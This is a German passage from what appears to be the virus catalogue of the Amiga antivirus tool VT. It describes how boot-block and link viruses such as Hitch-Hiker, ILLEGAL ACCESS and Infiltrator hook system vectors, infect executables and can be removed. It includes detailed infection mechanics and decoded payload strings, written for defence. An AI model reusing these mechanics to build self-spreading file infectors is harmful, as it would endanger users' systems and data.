werden nach dem Reset 2 Interrupts installiert. Nr. 3 = Ports = $7C1C6 = SS.install Nr. 5 = VERTB = $7C1E8 = SS.greets VT entfernt beim loeschen die Namen und setzt die Codezeiger auf 0 mit RemIntServer. Also keine Gefahr mehr. vgl. VT = Listen = IntVec Sobald die Zaehlzelle den Wert #$500 erreicht hat wird eine Graphikroutine angesprungen: schwarzer Hintergrund, helle Schrift Hakenkreuz,SS-Rune,Hakenkreuz und dann your computer is infected by SS-Virus! Danach ist ein Reset notwendig, da das VirusPrg. sich in einer Endlosschleife befindet. Der BB ist codiert mit eori.l #"HEIL",(a0)+ Von der Definition handelt es sich nicht um einen BB-Virus, da keine Vermehrungsroutine gefunden wurde. siehe auch MOSH, SS-Virus - Hilly KickTag, KickCheckSum, Kick1.2 DoIo im Prg mit absolutem ROMeinsprung Test auf spezielle Kickstartversion (patched bei $FC0090) Falls vorhanden kein Virusaufbau. Fordert trackdisk.device nicht an, deshalb koennen Schreib- zugriffe auf die Festplatte erfolgen !! Lage im Speicher: immer ab $7f300 (ResStruc.) Vermehrung: ueber BB sonst keine Routine gefunden (keine Graphik usw.) - Hireling Protector V1.0 anderer Name: Charlie Braun ForpibClone s.o. nur anderer Text - Hitch-Hiker-Virus Link Fileverlaengerung: 1692-1752 Bytes in Abhaengigkeit von $DFF007 Ab KS 2.04 Verbogene Vektoren LoadSeg, Write Nicht Resetfest Das Teil meldet sich nicht. Decodiert ist im Linkteil zu lesen: 62726172 79005468 65204869 7463682d brary.The Hitch- 48696b65 720a4765 6e657261 74696f6e Hiker.Generation 3a203030 30303030 3033436f 70796e75 : 00000003Copynu 6d626572 3a203030 30303030 3036202d mber: 00000006 - 20566572 73696f6e 20312e31 300a5468 Version 1.10.Th 616e6b73 20666f72 20746865 20526964 anks for the Rid 652c204d 69737465 72212121 00000000 e, Mister!!!.... Einbau im Speicher: LastAlert (202(a6)) wird auf $ABBAFAB4 ueberprueft. Falls ja Ende LoadSeg und Write wird verbogen. Im Dos.lib-Header wird der negative Offset auf 0 und der positive Offset auf $2a gesetzt. Zuletzt wird die Pruefsumme der DosLib geaendert. VT sollte in Tools/Systemtest ausgeben: NEG. Offset = 0 Virus ??? Ich empfehle Ihnen deshalb einen KReset auszufuehren, da die Originalwerte fuer Neg. u. Pos. Offset vom Linkteil nicht gerettet werden und deshalb nicht zurueckgeschrieben werden koennen. LoadSeg und Write sollte VT zuruecksetzen. Link an File hinter 1.Hunk: Speichermedium validated und mind. #10 Blocks frei File ausfuehrbar (3F3) CodeHunk (3E9) wird gefunden Filename enthaelt nicht "." oder "-" move.l 4,a6 (6 Bytes) oder move.l 4.w,a6 (4 Bytes) wird im 1.Hunks gefunden. Der Abstand von diesem Punkt zum Originalende des 1. Hunks ist nicht groesser als $7FFF. Falls diese Bedingungen zutreffen, wird der move.l 4-Befehl durch einen BSR-Befehl ($6100uvwx) ersetzt. Falls der Original- Befehl sechs Bytes lang war, wird noch ein NOP gesetzt, um die Laenge anzugleichen. Es koennen auch MEHRERE Spruenge erzeugt werden. VT versucht beim Ausbau move.l und move.w in Abhaengigkeit von gefundenem NOP zu setzen. Mehrfach-Links an ein File konnten NICHT erzeugt werden. - Hitch-Hiker-2-Inst. File Bekannter Filename: KillHitcher Bekannte Filelaenge: 3000 Bytes Ab KS 2.04 Keine verbogenen Vektoren !!!!! Nicht Resetfest Uncodiert ist am Fileende zu lesen: 79002843 6865636b 696e6720 666f7220 y.(Checking for 48697463 682d4869 6b657220 312e3130 Hitch-Hiker 1.10 2f322e30 312e2e2e 2e2e0a06 446f6e65 /2.01.......Done Decodiert ist aber in diesem File zu lesen: 496e In 7374616c 6c657220 76312e30 20627920 staller v1.0 by 556e6974 65642046 6f726365 5300633a United ForceS.c: 6c6f6164 77620000 633a6c69 73740000 loadwb..c:list.. 633a6469 7200 c:dir. Ablauf des Linkvorgangs: LastAlert (202(a6)) wird auf $ABBAFAB4 und $BADC0DED ueberprueft. Falls ja Ende . Textausgabe im cli: Checking for ... Also ein Taeuschungsversuch. In Wirklichkeit wird nach den Files c:loadwb usw. (s.o.) gesucht. Hinter den 1. Hunk dieser drei Files wird ein HH2 mit der Laenge 1880 Bytes gelinkt. Da loadwb in fast jeder startup-seq. vorkommt, wird das Teil bei jedem Reset neu im Speicher verankert. - Hitch-Hiker-2-Virus Link Bekannte Archive: DMS 2.40 Update DeluxeGalaga VersionsNr. unbekannt Fileverlaengerung: 1848-1908 Bytes in Abhaengigkeit von $DFF007 Ab KS 2.04 Verbogene Vektoren LoadSeg, Write Geaendert: LastAlert $BADC0DED Nicht Resetfest Das Teil meldet sich nicht. Codierung in Abhaengigkeit von $DFF007 Decodiert ist im Linkteil zu lesen: 54686520 48697463 682d4869 6b65720a The Hitch-Hiker. 47656e65 72617469 6f6e3a20 30303030 Generation: 0000 30313233 0a2d2056 65727369 6f6e2032 0123.- Version 2 2e30310a 0a0a5468 616e6b73 20666f72 .01...Thanks for 20746865 20526964 652c204d 69737465 the Ride, Miste 7221210a 00000000 r!!..... Einbau im Speicher: LastAlert (202(a6)) wird auf $ABBAFAB4 und $BADC0DED ueberprueft. Falls ja -> Ende . LoadSeg und Write wird verbogen. in LastAlert wird BADC0DED geschrieben. Link an File hinter 1.Hunk: Speichermedium validated und mind. #10 Blocks frei File ausfuehrbar (3F3) CodeHunk (3E9) wird gefunden Bei Filenamen KEIN Test auf bestimmte Buchstaben Es wurde im Viruscode zwar eine Laengenbegrenzung gefunden, aber diese Grenze wurde auf 68040 MEHRFACH ueberlaufen bei Test-Ver- mehrungen. move.l 4,a6 (6 Bytes), move.l 4.w,a6 (4 Bytes) oder RTS wird im 1.Hunks gefunden. Der Abstand von diesem Punkt zum Originalende des 1. Hunks ist nicht groesser als $7FFF (bei move) oder $7F (bei RTS). Falls diese Bedingungen zutreffen, wird der move.l 4-Befehl durch einen BSR-Befehl ($6100uvwx) ersetzt. Falls der Original- Befehl sechs Bytes lang war, wird noch ein NOP gesetzt, um die Laenge anzugleichen. Der RTS-Befehl wird durch einen BRA.s-Befehl ($60uv) ersetzt. Es koennen auch MEHRERE Spruenge erzeugt werden. VT versucht beim Ausbau move.l und move.w in Abhaengigkeit von gefundenem NOP zu setzen. Der BRA.s-Befehl sollte von VT durch ein RTS ersetzt werden (auch mehrfach). Mehrfach-Links an ein File konnten NICHT erzeugt werden. Hinweis 1: Bei Testverseuchungen sind AUCH defekte Files ent- standen. VT sollte den Ausbauversuch abbrechen und nur noch Loeschen anbieten. Hinweis 2: Falls Ihre Festplatte sehr verseucht ist, gehen Sie bitte in Sp->File->Sp, waehlen ein Unterverzeichnis (z.B. c) und klicken dann auf DirFTest. Gehen Sie danach weitere Unter- verz. (libs usw.) durch. - Hitch-Hiker-3-Inst. File Bekannter Filename: PatchHH Bekannte Filelaenge: 4148 Bytes Ab KS 2.04 Keine verbogenen Vektoren !!!!! Nicht Resetfest Soll laut File-ID vor HH schuetzen. Uncodiert ist im File zu lesen: 61746368 6564204c 61737441 6c657274 atched LastAlert 28292e2e 2e2e2e2e 0a3e4e6f 77207072 ().......>Now pr 6576656e 74696e67 20746861 74204869 eventing that Hi 7463682d 48696b65 7220312e 31302f32 tch-Hiker 1.10/2 2e30312f 332e3030 20626563 6f6d6573 .01/3.00 becomes Decodiert ist aber in diesem File zu lesen: 496e 7374616c Instal 6c657220 76312e31 20627920 556e6974 ler v1.1 by Unit 65642046 6f726365 5300633a 6c6f6164 ed ForceS.c:load 77620000 633a6c69 73740000 633a6469 wb..c:list..c:di 7200 r. Ablauf des Linkvorgangs: Nach LastAlert (202(a6)) wird $ABBAFAB4 geschrieben. Textausgabe im cli: Patched LastAlert ... Also ein Taeuschungsversuch. In Wirklichkeit wird nach den Files c:loadwb usw. (s.o.) gesucht. Hinter den 1. Hunk dieser drei Files wird ein HH3 mit der Laenge 3040 Bytes gelinkt. Da loadwb in fast jeder startup-seq. vorkommt, wird das Teil bei jedem Reset neu im Speicher verankert. - Hitch-Hiker-3-Virus Link Fileverlaengerung: 3000-3060 Bytes in Abhaengigkeit von $DFF007 Ab KS 2.04 Verbogene Vektoren LoadSeg, Write Geaendert: LastAlert $FAB4FAB4 Nicht Resetfest Das Teil meldet sich nicht. Codierung in Abhaengigkeit von $DFF007 Ausserdem wird in Abhaengigkeit von $DFF006 und $DFF007 der Viruskopf staendig geaendert (d0-d7,a0-a5,+Muell). Das ist neu und erschwert die Erkennung etwas. Decodiert ist im Linkteil zu lesen: 00005345 ..............SE 5450494e 53544e45 54504e45 5453433a TPINSTNETPNETSC: 4c6f6164 5742000a 646f732e 6c696272 LoadWB..dos.libr 61727900 0a0a5468 65204869 7463682d ary...The Hitch- 48696b65 720a4765 6e657261 74696f6e Hiker.Generation 3a203030 30303033 30330a2d 20566572 : 00000303.- Ver 73696f6e 20332e30 300a4c61 73742069 sion 3.00.Last i Einbau im Speicher: LastAlert (202(a6)) wird auf $FAB4FAB4 ueberprueft. Falls ja -> Ende . LoadSeg und Write wird verbogen. in LastAlert soll FAB4FAB4 geschrieben werden (bei mir nicht). Vorrangig soll c:loadwb (s.o.) verseucht werden. Ausserdem wird auf bestimmte files setp(atch) siehe oben usw. geprueft. Link an File hinter 1.Hunk: Speichermedium validated und mind. #10 Blocks frei File ausfuehrbar (3F3) CodeHunk (3E9) wird gefunden Bei Filenamen KEIN Test auf bestimmte Buchstaben Es wurde im Viruscode zwar eine Laengenbegrenzung gefunden, aber diese Grenze wurde auf 68040 MEHRFACH ueberlaufen bei Test-Ver- mehrungen. move.l 4,a6 (6 Bytes), move.l 4.w,a6 (4 Bytes) oder RTS wird im 1.Hunks gefunden. Der Abstand von diesem Punkt zum Originalende des 1. Hunks ist nicht groesser als $7FFF (bei move) oder $7F (bei RTS). Falls diese Bedingungen zutreffen, wird der move.l 4-Befehl durch einen BSR-Befehl ($6100uvwx) ersetzt. Falls der Original- Befehl sechs Bytes lang war, wird noch ein NOP gesetzt, um die Laenge anzugleichen. Der RTS-Befehl wird durch einen BRA.s-Befehl ($60uv) ersetzt. Es koennen auch MEHRERE Spruenge erzeugt werden. VT versucht beim Ausbau move.l und move.w in Abhaengigkeit von gefundenem NOP zu setzen. Der BRA.s-Befehl sollte von VT durch ein RTS ersetzt werden (auch mehrfach). Mehrfach-Links an ein File konnten NICHT erzeugt werden. Hinweis 1: Bei Testverseuchungen sind AUCH defekte Files ent- standen. VT sollte den Ausbauversuch abbrechen und nur noch Loeschen anbieten. Hinweis 2: Falls Ihre Festplatte sehr verseucht ist, gehen Sie bitte in Sp->File->Sp, waehlen ein Unterverzeichnis (z.B. c) und klicken dann auf DirFTest. Gehen Sie danach weitere Unter- verz. (libs usw.) durch. Hinweis3 : Mit BlockKetteTest ist der HH3 nicht immer zu finden. Begruendung: Da der Viruskopf sich staendig veraendert, muss VT bis zu #250 Bytes vergleichen. Die Wahrscheinlichkeit, dass ALLE diese Bytes in EINEM Block liegen ist gering. - Hitch-Hiker4-Virus File Link Verbogene Vektoren: Trap #0-7 (abhaengig von $DFF007) JMP von PutMes KS2.04: ja Resetfest: nein Fileverlaengerung: #3052 Bytes Link als ersten Hunk. Uncodiert ist am Fileanfang zu lesen: 2d436f70 79436174 20446563 72756e63 -CopyCat Decrunc 68657220 56312e30 312d her V1.01- Decodiert ist im VirusTeil zu lesen: 79004c48 414c5a58 5a4f4f5a 49500a54 y.LHALZXZOOZIP.T 68652042 61737461 72642069 73204261 he Bastard is Ba 636b210a 54686520 48697463 682d4869 ck!.The Hitch-Hi 6b65720a 2d205665 7273696f 6e20342e ker.- Version 4. 3131200a 11 . VT versucht den Process im Speicher abzuschalten. Das heisst: Bei diesem Virusteil versucht VT NICHT den Process zu entfernen, sondern versucht den Process nur in eine NUTZLOSE LEERE Endlosschleife zu versetzen. Lieber waere mir allerdings, wenn Sie von einer "sauberen" und schreibgeschuetzten Disk starten wuerden, um einem Absturz beim Veraendern des Processes vorzubeugen. VT versucht das Virusteil aus einem File auszubauen. Speicherverankerung: - Speicher noch nicht verseucht. - Ein Prozess wird erzeugt. Name wird aus LibList geholt (abhaengig von $DFF007). Der Name wird auf max $F+1 ge- kuerzt. Taucht vorher im Namen z.B. exec.library der Punkt auf, so wird am Punkt abgebrochen (ergibt Prozessname exec). Dieser Prozess ueberwacht nach DosDelay die anderen Ver- aenderungen und setzt sie bei Bedarf jeweils neu. - JMP von PutMes wird durch $4E40-$4E47 (abhaengig von $DFF007) ersetzt (ergibt Trap #0-7). - ZeroPage oder falls vorhanden VecPage wird veraendert. VBR (oder 0) + $80 + ((0/1/2/3/4/5/5/7)*4). (also $80-$9c) Vermehrungsbedingungen: - Medium validated - Medium mind. #10 Blocks frei - File noch nicht verseucht - File ausfuehrbar ($3F3) - Filename ohne "." oder "-" (also keine xyz.library) Vermehrung: - Filestruktur wird in zwei Hunks umgewandelt. - Vom Fileanfang werden #3048 Bytes ans Fileende verschoben. #3048 und eine 3F2-Kennung = #3052. In den freien Platz am Fileanfang wird das Virusteil eingebaut. - Veraendert FileComment-Zeile Hinweis: Fremdaussage: Es sollen auch defekte Files entstehen. VT sollte dann nur Loeschen anbieten. z.B. $3F2 am Fileende fehlt (vgl. RKM, Babel usw.). Hinweis2: Falls Ihre Festplatte stark verseucht ist, gehen Sie bitte in Sp-File-Sp und testen Sie einzelne SubDir (DirFTest). - Hitch-Hiker4.23-Virus File Link Verbogene Vektoren: Trap 8-F (abhaengig von $DFF007) JMP von PutMes KS2.04: ja Resetfest: nein Fileverlaengerung: #2912 Bytes Link als ersten Hunk. Decodiert ist im VirusTeil zu lesen: 62726172 79004c48 414c5a58 5a4f4f5a brary.LHALZXZOOZ 49506273 64736f63 6b65742e 6c696272 IPbsdsocket.libr 61727900 504f5354 0d0a4441 54410d0a ary.POST..DATA.. 51554954 0d0a5468 65204869 7463682d QUIT..The Hitch- 48696b65 7220342e 32332020 2d204765 Hiker 4.23 - Ge 6e657261 74696f6e 20233030 30303130 neration #000010 33320d0a 32.. Speicherverankerung: - Speicher noch nicht verseucht. - Es wird nach bsdsocket.library gesucht und falls vorhanden einige Sprungvektoren verbogen. Diese Lib liegt nicht in Libs, sondern wird von einigen Programmen (z.B. Miami) im Programm mitgefuehrt. Diese Lib wird immer nach Programmende (Miami) wieder aus dem Speicher entfernt, auch wenn Vektoren (z.B. -$4) von HH4.23 verbogen waren. (So war es auf meinem Testrechner). - JMP von PutMes wird durch $4E48-$4E4F (abhaengig von $DFF007) ersetzt (ergibt Trap 8-F). - ZeroPage oder falls vorhanden, VecPage wird veraendert. VBR (oder 0) + $80 + [8+(0/1/2/3/4/5/5/7)]*4. (also $A0-$BC) Vermehrungsbedingungen: - Medium validated - Medium mind. #10 Blocks frei - File noch nicht verseucht - File ausfuehrbar ($3F3) - Filename ohne "." oder "-" (also keine xyz.library) - Filelaenge Min: #2908 Bytes - Filelaenge Max: keine Grenze im Linkteil gefunden Vermehrung: - Filestruktur wird in zwei Hunks umgewandelt. - Vom Fileanfang werden #2908 Bytes ans Fileende verschoben. #2908 und eine 3F2-Kennung = #2912. In den freien Platz am Fileanfang wird das Virusteil eingebaut. Hinweis: Falls Ihre Festplatte stark verseucht ist, gehen Sie bitte in Sp-File-Sp und testen Sie einzelne SubDir (DirFTest). - Hochofen Link auch mit KS2.04 verlaengert ein File um 3000 Bytes KEINE bekannten Vektoren verbogen !!!! Wurde mir als Trabbi zugeschickt. Da ich diesen Namen nicht nachvollziehen kann (kommt im Prg-code nicht vor), nenne ich ihn Hochofen (im 1. Hunk zu lesen). Taskname: Greetings to Hochofen Vermehrung: NUR moeglich beim Start eines bereits verseuchten Prgs. Scannt Root durch (examine, exnext usw.) und sucht nach Files, die - ausfuehrbar ($3F3) - kleiner als 200000 Bytes - noch nicht befallen sind. Haengt sich dann als erster Hunk an und verlaengert das File um 3000 Bytes (Hunk nicht codiert). Hinweis: NICHT jedes verseuchte File ist lauffaehig ! s.u. Schaeden: Task: Greetings to Hochofen im Task: KEIN VermehrungsPrgTeil zeitabhaengig: BildschirmHintergrund schwarz rot gelb mit Maustaste wegklicken Requester Fasten seat-belt! mit Maustaste wegklicken Task wird wieder entfernt Fehler: kennt viele Hunktypen NICHT und veraendert durch einen Schleifenfehler dann den Hunktyp um +1. Als Beispiel, weil ich es da zuerst bemerkt habe: Kennt hunksymbol ($3F0) nicht und macht daraus hunkdebug ($3F1). In unbekannten Hunks werden auch in einer Schleife Bytes FALSCH geaendert. Verseuchte Files die den Computer zum Absturz bringen, ver- aendern bei mir auch die Hardwareuhr !!!! Vermehrung getestet: ja auch mit ROM KS2.04 Ausbau getestet: ja mit VT 2.37 - HODEN-Virus BB nur KS1.2, da absoluter DoIo-Einsprung DoIo, KickTag, KickCheckSum, im Speicher immer $7f000 Fordert trackdisk.device NICHT. Vermehrung: ueber BB Kennzeichen: nach fuenf Kopien wandert ein gelber Kopf von links nach rechts ueber den Bildschirm. unverschluesselt steht im BB: HODEN V33.17 Clone: COHEN-Virus - Hostile Takeover Virus siehe bei Smeg-Virus - HULKSTERS-Virus BB Pentagon-Clone s.u. Text geaendert: z.B. SACHSEN/ANHALT usw. - Hunklab-BootJob File GROSSE GEFAHR !!!!!!!!!! Mit BootJob wurde ein BB in ein ausfuehrbares File umgewandelt. Dieses BootJob-File wurde mit HunkLab an ein anderes File ange- haengt. Fertigen Sie bitte eine Kopie dieses Files an und unter- suchen Sie es genauer. VT sollte Ausbau anbieten. Vgl. auch TAI7-Installer, East-Star-Install, CRACKER-Ext.Inst. KIMBLE.BB-Inst., Firedom.BB-Inst. - HunkLab-Link ?? Link von VT NUR im ungepackten Zustand erkannt !!! Es soll sich um ein XCopy-Programm handeln, das es ermoeg- licht, sowohl NutzPrg.e als auch Viren vor bereits vorhandene Programme zu haengen. Ganz ehrlich. Ich verstehe die Welt nicht mehr. Wie kann eine Firma so ein Programm verkaufen, das es jedem Anfaenger AUCH erlaubt, Viren an ein vor- handenes Programm zu linken ????? ABER NOCH EINMAL: Nicht jedes mit Hunklab veraenderte Programm muss ein Virus- teil enthalten. Zu Beginn des 1.Hunks ist zu lesen: 58892f49 003c4cdf 7fff4e75 556e6974 X./I.<L...NuUnit 6564a046 6f726365 53000000 00000001 ed.ForceS....... Bitte nehmen Sie fuer den Ausbau eine Kopie ihrer Disk. Ich habe nur 5 verseuchte Files (AIBON). Da ich Hunk- Lab nicht besitze, kann ich keine weiteren Files linken. Die Routine koennte also wackeln. Bitte teilen Sie mir festgestellte Fehler mit. Danke Fileerkennung und Ausbau mit VT: 05/06.12.92 Hinweis 30.12.92: Es soll in der Szene ein modifiziertes Hunklabprogramm (oder aehnlich programmiert) Verwendung finden. Es kann also zu Verwechslungen kommen und die Programme sind vielleicht nach dem Ausbau NICHT mehr lauffaehig. Fertigen Sie also BITTE eine Kopie und ver- suchen Sie mit dieser den Ausbau. - ICE SCAClone BB Cool, im Prg. DoIo, im Speicher immer ab $7ec00 Vermehrung: ueber BB Textausgabe durch GraphikRoutine unverschluesselt steht im BB: Greets from The Iceman & The IRQ usw. - IconD-Trojan Varianten Name geaendert in Biomechanic siehe oben - ILLEGAL-Virus Link Mind. KS 39 fuer Vermehrung Mind. 68020 Fileverlaengerung um #4000 Bytes (variabel) Mehrfach codiert Versucht sich resetfest zu machen (probieren Sie KReset) Im decodierten File ist zu lesen: 2820 494c4c45 ( ILLE 47414c20 41434345 53532056 69727573 GAL ACCESS Virus ;.... 76697275 73007761 726e0072 65736574 virus.warn.reset 006d6f64 69660074 74656e74 69006b69 .modif.ttenti.ki 6c6c00ff 2e696e66 6f006b65 79626f61 ll...info.keyboa 72642e64 65766963 65002e6c 69627261 rd.device..libra 7279002e 64617461 74797065 002e6761 ry..datatype..ga 64676574 002e6c61 6e677561 676500ff dget..language.. 2d68616e 64004c49 42533a44 4556533a -hand.LIBS:DEVS: Im Speicher: Verbiegt $10 von Zero- oder VecPage. Ersetzt in Libs und keyboard.device bei VERSCHIEDENEN Sprung- befehlen das $4EF9 durch $4AFC. Falls ein Programm nun so eine Funktion aufruft, wird immer zuerst das Virusteil durchlaufen und dann die Originalfunktion ausgefuehrt. VT versucht alle $4AFC und $10 (Enforcer-Hit!!!!) zurueckzusetzen. BITTE !!!!! kontrollieren Sie mit Tools/Systemtest und Tools/Zero- und Tools/VecPage nach, ob VT wirklich ALLE Manipulationen ge- funden hat. Danke Linkverhalten: Variante a: Haengt sich als 1.Hunk ein und codiert das 1. Wort des ursprueng- lich 1.Hunks. Variante b: Files, die eine Res-Struktur haben (z.B. libs, device, usw.) Der Link erfolgt hinter den 1.Hunk . Das Reloc von Init oder Init- Routine (abhaengig von Flag 7) wird auf den Virusbeginn geaendert. Die Versions-Nr. im IDString wird erhoeht. Die Versions-Nr. in der Res-Struktur wird erhoeht (abhaengig von Flag 0). Im Reloc- Hunk, der zu diesem Original-Hunk gehoert wird 1 Reloc zusaetzlich eingetragen. Beispiel fuer Versionsver: Orig. vers. 70ff4e75 4afc0000 p.NuJ... : 70ff4e75 4afc0000 p.NuJ... 00040000 04ce0122 ......." : 00040000 04ce0123 .......# ;..... ^ ^ 342e3920 28313820 4.9 (18 : 352e3920 28313820 5.9 (18 ^ ^ Link-Ausbau mit VT: Falls Sie das Teil leider finden, so ist wahrscheinlich nicht nur ein File verseucht. Ueberlegen Sie bitte, ob es nicht besser ist, von den Original-WB-Disks C, Libs, devs, Classes, Language neu aufzukopieren. Danach sollten Sie im FileRequester von VT einzelne Unterverzeich- nisse (z.B. devs) mit DirFtest scannen (Sie sparen Zeit, da sich VT dann nur in diesem Verz. bewegt). Link als 1.Hunk: Sollte VT ohne Probleme ausbauen und das 1.Wort decodieren. Link hinter 1.Hunk (libs usw.): VT schneidet das Virusteil aus. VT setzt das Ursprungs-Reloc von Init. VT kuerzt den Reloc-Hunk um 4 Bytes (entfernt das eine zusaetz- lichen Reloc-LW). Probleme: VT versucht im IDString die Versions-Nr. herunterzusetzen. Dies ist nicht immer richtig, falls VT eine 9 als letzte Zahl findet. z.B. 35.9 : Das Virusteil erzeugt diesen Wert aus 35.8 ODER aus 34.9 (siehe oben). VT erwartet nach dem Virusteil den 3EC-Hunk. Ich hab nur solche verseuchte Libs. Falls jemand andere Hunks findet, bitte ich um Zusendung. Danke !! Falls dieser Hunk nicht gefunden wird, bietet VT nur loeschen an. Ich habe sehr viele libs, devs usw. durchge- sehen und immer war der Reloc-Hunk gleich im Anschluss. ABER !!!!! Das Virusteil hat aber eine Routine, die den Reloc-0-Hunk auch weiter hinten sucht, wenn zuvor z.B. ein 3F0-Hunk kommt. Was ich nicht testen kann, baue ich nicht ein. Hinweis: Es sind einige Files aufgetaucht, in denen ILLEGAL ACCESS zu lesen ist. Es hat also jemand diese Files teilweise decodiert. Vermutlich um den Ablauf der Decodierung zu verfolgen. Diese Files sind NICHT mehr lauffaehig !!! Ein SAUBERER Ausbau ist NICHT moeglich. Ein sicheres Erkennen solcher Files ist NICHT mehr moeg- lich, da an moeglichen und unmoeglichen Stellen der Decodierroutine NOPs oder RTS gesetzt wurden. Loeschen Sie solche Files bitte. - Inboot File BB-exe-Laenge:1400 Ein Nutz-Utility-Prg. zum Abspeichern eines BBs als aus- fuehrbares File. Bei Filetest und BlockKette wird Inboot erkannt. Wenn Sie wissen wollen, um welchen BB es sich handelt, gehen Sie bitte in den File-Req., klicken das File an und klicken dann auf Filetest. Mit Convert koennen Sie einen Ausbauversuch wagen. - Incognito anderer Name Trojan DoIo, KickMem, KickTag, KickCheckSum, FastMem ja nur KS1.2, da absoluter DoIo-Einsprung ins ROM Vermehrung: ueber BB sonst keine Schaeden und kein Text im BB: nichts zu sehen, da trackdisk.device verschluesselt. - INDIANA JONES BB Cool immer $7E656 im Prg: DoIo $7E690, FindRes $7E676 KS2.04: ja immer ab $7E600 Fordert trackdisk.device NICHT Warhawk-Clone Unterschied: die Textausgabe ueber Graphik-Routine wurde entfernt. Vermehrung: BB Namensbegruendung: Wenn Sie im BB die $7F-Zeichen richtig anordnen, ergibt sich: ····#··#··.#·##···#·####·#···#·####······####·####·#···#·###·### ····#··##·.#·#·#··#·#..#·##··#·#··#·········#·#··#·##··#·#···#·· ····#··#·#.#·#··#·#·# .#·#·#·#·#··#·········#·#··#·#·#·#·##.·### ····#··#·.##·#·#··#·####·#··##·####·······#·#·#··#·#··##·#···..# ····#··#··.#·##···#.#·.#·#···#·#··#······#··#·####·#···#·###·### ··········································##···················· - INFECTOR Virus BB ein Fast Eddie Clone Nur Texte geaendert. Wieder einmal eine Meisterleistung !!! KickTag, KickCheckSum KS2.04 nein im Prg nach Reset noch DoIo, $6c, im Speicher immer $7F000 fordert trackdisk.device NICHT. Im BB ist an $1c !IN! zu lesen Wird aktiv wenn Block 880 gelesen wird Schaeden: blockiert nach 15 oder 20 Min. Rechner (Farbspiel) schreibt eigenen Virus-BB bestimmt einen Block ueber $DFF006 durch mulu #6,d7 und schreibt in diesen Block ab $100 INFECTOR GO! . Block: 732 000000f0: 34071070 b9f9b1c6 3b3bf014 47d8b589 4..p....;;..G... 00000100: 494e4645 43544f52 20474f21 f403d488 INFECTOR GO!.... 00000110: 607c98e2 5e0d3de0 28ca7775 a94a0f0e `...^.=.(.wu.J.. Dieser Block und auch das File kann NICHT gerettet werden. Benennt Disknamen um >INFECTOR BY DARK< . Arbeitet mit $6E000, dies ist nur bei einer DD-Disk der RootBlock !! Block: 880 000001a0: 00000000 00001624 00000359 00000b1d .......$...Y.... 000001b0: 1d3e494e 46454354 4f522042 59204441 .>INFECTOR BY DA 000001c0: 524b3c00 00000000 00000000 00000000 RK<............. Auf einer HD-Disk wird also ein zusaetzliches File zerstoert. Codiert jeden BB neu mit ByteWert von $DFF006 eor.b d1,(a0)+ . Decodiert eigenen BB mit eor.b d6,(a0)+ . Decodiert im Speicher : THIS IS THE FIRST VIRUS WRITTEN BY THE DARK AVENGER !!! siehe auch oben bei Fast Eddie - Infiltrator Link anderer Name Klein-Virus (von mir nicht nachvollziehbar) Arbeitet erst ab dos.library-Version #36 oder hoeher (also keine Vermehrung mit KS1.2 oder KS1.3) Verbiegt OldLoadSeg (NewLoadseg wird nicht verbogen) Ueberprueft ob Virus schon installiert mit Zeichenfolge "1992". Verlaengert ein File um 1052 Bytes. Am File ist das Virusprogramm codiert mit eori.b x,(A0)+ . Das Byte x aendert sich bei jedem neuen Linkvorgang in Abhaengig- keit von $DFF006 . Im Programm ist ein Textteil codiert mit: move.w #$80,d0 loop: eor.b d0,(a0)+ dbra d0,loop Decodiert ist dann zu lesen: Howdy hacker! This is The Infiltrator! usw. Versucht auch ein File "user.data",0 zu oeffnen. Arbeitsweise: - Sucht nach dem Langwort, das die Laenge des 1.CodeHunks enthaelt und erhoeht den Wert um $107 . - Schreibt zu Beginn des 1. CodeHunks 6100xxyy (bsr xxyy) d.h. der OriginalSourceCode wird ueberschrieben. - Haengt sich codiert am Ende des 1.OriginalCodeHunks an. d.h. keine Erhoehung der HunkAnzahl. Vermehrungsbedingungen: - Disk validated - mindestens 8 Bloecke Platz - 1. CodeHunk nicht groesser als $1ffc * 4 = $7FF0 (von Virusprogramm getestet ) - Test 1. Wort im CodeHunk auf - $4EF9 (Jmp) falls ja keine Verseuchung - $4EB9 (Jsr) falls ja keine Verseuchung - Test ob schon von Infiltrator verseucht 1. Wort im CodeHunk auf - $6100 (bsr) falls ja 2. Test an anderer Stelle auf - $48E7FFFE falls ja schon verseucht, deshalb Ende. Ergebnis: verseucht auch libs, devices usw. AUCH auf FESTPLATTE !!!!! NACHTRAG 26.07.92 : entgegen dem schon befallen Selbsttest ist es mir gelungen das Virusprogrammteil 2x an diskfont.library zu linken !!!! Erfolg: NICHT alle Programme sind danach lauffaehig !!!!! (von Shell mehr als von WB) Ausbau: VT versucht den Originalzustand wieder herzustellen. Falls es Probleme gibt, wenden Sie sich bitte an mich. NACH dem FileTest machen Sie bitte ein EinzelFileCopy auf eine leere formatierte Disk. Zwei Gruende: - die Fragmentierung der Files wird aufgehoben (Disk ist wieder schneller) - es werden nur benutzte Bloecke kopiert, d.h. jetzt nicht mehr von Files belegte Bloecke werden nicht mitkopiert und so kann dann auch BlockITest keinen Infiltrator auf der NEUEN Disk in einem unbenutzten Block finden. Suche: Sie MUESSEN mit FileTest suchen. Bei BlockKette kann eine Meldung unterbleiben, wenn von den 3 Testlangworten 2 im Block x und 1 LW im Block x+1 liegen. Bitte: Suchen Sie NICHT nach verseuchten Files, solange ein sogenanntes "Nutzprogramm" aktiv ist, das loadseg verbiegt. Hinter diesem Nutzprg koennte der Infiltrator liegen !!! Folge: Das Nutzprogramm ueberprueft beim Laden das File und stellt fest, dass das File von ihm NICHT zu bearbeiten ist (also z.B. nicht gepackt) und uebergibt an den "OrigLoad- Seg-Vektor". Nur leider ist der "OrigLoadSeg-Vektor" auf die Infiltrator-Routine verbogen !!!! Ihre Erfolgsaussichten sind NULL !!!!!! - INFLUENZA BB Cool $7F320, DoIo $7F0FC, $60, immer ab $7F000 Fordert trackdisk.device NICHT Turk-Clone Unterschiede: - Cool-Einsprung im Prg. verschoben - keine DisplayAlert-Routine Vermehrung: ueber BB Schaeden: - schreibt FUCK nach $60 - Sobald in $300 (absolut!) der Wert #10 steht, wird die Disk von Zylinder 0-39 formatiert. Namensbegruendung: im BB ist zu lesen: 20202020 48452048 45203c2d 20202d2b HE HE <- -+ 2d204920 4e204620 4c205520 45204e20 - I N F L U E N 5a204120 2d2b2d20 202d3e20 20205355 Z A -+- -> SU - Inger IQ ByteBandit/Forpib-Clone s.d. Text: ---Inger IQ Virus - Ersmark 1953--- - INGO-ZENKER-Clone BB KS2.04: ja im Speicher immer ab $7F800 Cool $7F86c DoIo $7F894 NEU: $6c Fordert trackdisk.device NICHT Versucht im BB durch 